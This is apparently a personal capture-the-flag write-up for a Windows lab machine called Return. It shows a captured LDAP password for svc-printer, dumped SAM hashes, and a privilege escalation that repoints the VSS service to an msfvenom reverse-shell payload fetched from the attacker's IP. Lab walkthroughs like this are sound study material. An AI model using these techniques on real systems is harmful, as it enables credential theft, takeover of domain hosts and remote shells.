Return - Writeup - Konstantinovitz

## `anonymous` ### ldap - null sessions not permitted ### smb - guest account disabled ### LLMNR Poisoning - no love ## printer admin UI - 80 HTTP ![[Pasted image 20250131220231.png]] - seems I can change the password for the `svc-printer` user here? - gobuster yields nothing of interest - we got a username? - no [[ASREPRoast]] - setting the password in the UI dosent seem to do much? - but i dont see any other ways as of now - verifying the users existence using [[Kerbrute]]: ![[Pasted image 20250131222824.png]] - attempting to bruteforce the account using `kerbrute` (pray there's no account lock-out lol) - setting the password to `admin` and attempting to authenticate as `svc-printer:admin` using [[NetExec-TODO]] yields no love. - running `sudo nc -lnvp 389` and changing the 'Server Address' input field to my tunnel IP as so ![[Pasted image 20250131230438.png]] makes the page forward the credentials to my local machine yielding what I assume is a password: ``` [λ]- [svc-printer]-> sudo nc -lnvp 389 Listening on 0.0.0.0 389 Connection received on 10.10.11.108 52665 0*`%return\svc-printer 1edFg43012!! ``` - verifying the credentials using NetExec - yields love on [[WinRM - 5986 HTTP]] - ## `svc-printer`->`Administrator` ### SMB - got `READ` on [[SMB Share - ADMIN$]] - ![[Pasted image 20250131231039.png]] ### `SeBackupPrivilege` System has `SeBackupPrivilege`, see [[AD Group - Backup Operator]] ``` secretsdump.py -sam SAM -system SYSTEM LOCAL Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up... ``` - hash authentication don't seem to be workin: `evil-winrm -i $RHOST -u Administrator -H 34386a771aaca697f447754e4863d38a` ### `Server Operators` Group - We can start and stop windows services - We leverage this to reconfigure the [Volume Shadow Copy Service (VSS)](https://learn.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service) `binPath` to replace the default binary with a malicious payload: ```powersehll upload agent.exe get-service vss sc.exe config vss binPath="C:\Users\svc-printer\AppData\Local\Temp\DIFFERENT_PATINA.exe" # times out msfvenom -p windows/shell_reverse_tcp LHOST=$(get_tun0_ip.sh) LPORT=8080 --arch x64 -f exe > shell.exe curl 10.10.14.7/shell.exe -o shell.exe sc.exe config vss binPath="C:\Users\svc-printer\AppData\Local\Temp\shell.exe" ``` aaaaaand we get `r00t`.